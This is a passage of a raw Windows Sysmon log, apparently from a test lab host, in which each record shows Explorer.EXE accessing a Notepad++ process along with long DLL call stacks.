COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001046495Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046494Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046493Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046492Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001046491Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046490Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046489Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046488Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.774{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001046487Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.759{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001046486Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.759{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 
10341000x80000000000000001046485Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.759{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001046484Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.759{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001046483Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.759{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046482Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.759{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046481Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.759{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001046480Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.759{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001046479Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:38.759{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\S